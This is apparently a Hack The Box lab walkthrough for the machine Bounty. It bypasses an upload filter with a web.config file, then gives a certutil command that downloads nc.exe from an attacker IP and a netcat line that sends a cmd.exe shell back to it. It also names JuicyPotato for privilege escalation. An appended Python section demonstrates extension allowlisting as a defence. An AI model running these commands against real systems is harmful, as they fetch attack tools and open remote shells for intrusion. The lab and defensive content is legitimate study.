HTB - Bounty web.config bind shell
Walkthrough
First I do an nmap scan on Bounty. Port 80 is open.
We notice transfer.aspx and UploadedFiles exist. We cannot upload files with .asp or .aspx extensions. Let's try web.config and use this bind shell.
The web.config will be deleted within 1-4 minutes after you upload it. Quickly use netcat to get a shell on the box.
certutil -f -urlcache http://10.10.14.2/nc.exe C:\temp\nc.exe
C:\temp\nc.exe 10.10.14.2 53 -e C:\Windows\System32\cmd.exe
The usual 4444 will not work. Use ports 53 or 443 instead.
Use JuicyPotato.exe for privilege escalation.
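For defenders: the upload filter above rejected .asp and .aspx but let web.config through, which is the gap a blocklist leaves. The following is an added example, not code from the box or from this walkthrough, comparing that blocklist with an extension allowlist plus server-generated storage names; the allowed extensions, function names and sample filenames are assumptions made for illustration.

```python
import os
import re
import secrets

# Assumption: the upload feature only needs to accept images.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# The style of filter the walkthrough ran into: only known-bad extensions.
BLOCKED_EXTENSIONS = {".asp", ".aspx"}
# One plain stem: letters, digits, '_' and '-', at most 64 characters.
SAFE_STEM = re.compile(r"[a-z0-9][a-z0-9_-]{0,63}")


def blocklist_accepts(filename):
    """Weak check: reject only the extensions someone thought to list."""
    ext = os.path.splitext(filename.lower())[1]
    return ext not in BLOCKED_EXTENSIONS


def allowlist_accepts(filename):
    """Strict check: one plain stem plus one expected extension, nothing else."""
    stem, ext = os.path.splitext(filename.lower())
    return ext in ALLOWED_EXTENSIONS and SAFE_STEM.fullmatch(stem) is not None


def stored_name(filename):
    """Name to write to disk: random, so the client never chooses it."""
    if not allowlist_accepts(filename):
        return None
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


def review(filenames):
    """Return {filename: (blocklist verdict, allowlist verdict)}."""
    return {f: (blocklist_accepts(f), allowlist_accepts(f)) for f in filenames}


# Constructed sample upload names.
SAMPLES = ["photo.jpg", "Photo.PNG", "shell.asp", "shell.aspx",
           "web.config", "Web.Config"]

if __name__ == "__main__":
    for name, (weak, strict) in review(SAMPLES).items():
        print(f"{name:12} blocklist={weak!s:5} allowlist={strict!s:5} "
              f"stored_as={stored_name(name)}")
```

Because the file is written under a random name, an accepted upload can never land on disk as web.config, whatever the client called it.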